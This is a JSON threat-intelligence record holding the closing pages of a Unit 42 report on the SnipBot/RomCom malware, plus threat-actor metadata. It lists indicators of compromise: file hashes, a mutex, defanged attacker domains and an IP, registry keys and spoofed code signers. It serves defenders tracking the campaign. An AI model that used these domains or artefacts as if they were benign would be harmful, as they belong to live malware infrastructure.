article as malicious. Advanced URL Filtering and Advanced DNS Security classify\r\nknown URLs and domains associated with this activity as malicious.\r\nIf you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA\r\nmembers use this intelligence to rapidly deploy protections to their customers and to systematically disrupt\r\nmalicious cyber actors. Learn more about the Cyber Threat Alliance.\r\nWe would like to thank Sophos for the collaboration.\r\nIndicators of Compromise\r\nFiles (Read: SHA256 hash - file type)\r\n0be3116a3edc063283f3693591c388eec67801cdd140a90c4270679e01677501 - 64-bit EXE\r\n1cb4ff70f69c988196052eaacf438b1d453bbfb08392e1db3df97c82ed35c154 - 64-bit DLL\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 23 of 25\n\n2c327087b063e89c376fd84d48af7b855e686936765876da2433485d496cb3a4 - 64-bit EXE\r\n5390ba094cf556f9d7bbb00f90c9ca9e04044847c3293d6e468cb0aaeb688129 - 64-bit EXE\r\n57e59b156a3ff2a3333075baef684f49c63069d296b3b036ced9ed781fd42312 - 64-bit EXE\r\n5b30a5b71ef795e07c91b7a43b3c1113894a82ddffc212a2fa71eebc078f5118 - 64-bit EXE\r\n5c71601717bed14da74980ad554ad35d751691b2510653223c699e1f006195b8 - 64-bit EXE\r\n60d96087c35dadca805b9f0ad1e53b414bcd3341d25d36e0190f1b2bbfd66315 - 64-bit DLL\r\n92c8b63b2dd31cf3ac6512f0da60dabd0ce179023ab68b8838e7dc16ef7e363d - 64-bit DLL\r\na2f2e88a5e2a3d81f4b130a2f93fb60b3de34550a7332895a084099d99a3d436 - 64-bit EXE\r\nb9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045 - 64-bit EXE\r\ncfb1e3cc05d575b86db6c85267a52d8f1e6785b106797319a72dd6d19b4dc317 - 64-bit EXE\r\ne5812860a92edca97a2a04a3151d1247c066ed29ae6bbcf327d713fbad7e79e8 - 64-bit DLL\r\nf74ebf0506dc3aebc9ba6ca1e7460d9d84543d7dadb5e9912b86b843e8a5b671 - PDF document\r\nMutex\r\nSnipMutex\r\nAssociated Domains/IP addresses\r\nfastshare[.]click\r\ndocstorage[.]link\r\npublicshare[.]link\r\nxeontime[.]com\r\ndrvmcprotect[.]com\r\nmcprotect[.]cloud\r\ncethernet[.]com\r\nsitepanel[.]top\r\nilogicflow[.]com\r\nwebtimeapi[.]com\r\ndns-msn[.]com\r\ncertifysop[.]com\r\ndrv2ms[.]com\r\nolminx[.]com\r\nlinedrv[.]com\r\nadobe.cloudcreative[.]digital\r\n1drv.fileshare[.]direct\r\n91.92.250[.]104\r\nDirectory paths\r\n%LOCALAPPDATA%\\KeyStore\r\n%LOCALAPPDATA%\\DataCache\r\n%LOCALAPPDATA%\\AppTemp\r\nRegistry Keys\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 24 of 25\n\nHKCU\\SOFTWARE\\AppDataSoft\r\nHKCU\\SOFTWARE\\AppDataHigh\r\nCode Signers (Possibly Spoofed)\r\nCC Byg og Udlejning ApS\r\nCOSMART LLC\r\nKHAROS LLC\r\nHangzhou Yueju Apparel Co., Ltd.\r\nARION LLC\r\nSource: https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/"
	],
	"report_names": [
		"snipbot-romcom-malware-variant"
	],
	"threat_actors": [
		{
			"id": "555e2cac-931d-4ad4-8eaa-64df6451059d",
			"created_at": "2023-01-06T13:46:39.48103Z",
			"updated_at": "2026-04-10T02:00:03.342729Z",
			"deleted_at": null,
			"main_name": "RomCom",
			"aliases": [
				"UAT-5647",
				"Storm-0978"
			],
			"source_name": "MISPGALAXY:RomCom",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d58052ba-978b-4775-985a-26ed8e64f98c",
			"created_at": "2023-09-07T02:02:48.069895Z",
			"updated_at": "2026-04-10T02:00:04.946879Z",
			"deleted_at": null,
			"main_name": "Tropical Scorpius",
			"aliases": [
				"DEV-0978",
				"RomCom",
				"Storm-0671",
				"Storm-0978",
				"TA829",
				"Tropical Scorpius",
				"UAC-0180",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "ETDA:Tropical Scorpius",
			"tools": [
				"COLDDRAW",
				"Cuba",
				"Industrial Spy",
				"PEAPOD",
				"ROMCOM",
				"ROMCOM RAT",
				"SingleCamper",
				"SnipBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434724,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/353219416037a7d696f24672037c80518463ac24.pdf",
		"text": "https://archive.orkl.eu/353219416037a7d696f24672037c80518463ac24.txt",
		"img": "https://archive.orkl.eu/353219416037a7d696f24672037c80518463ac24.jpg"
	}
}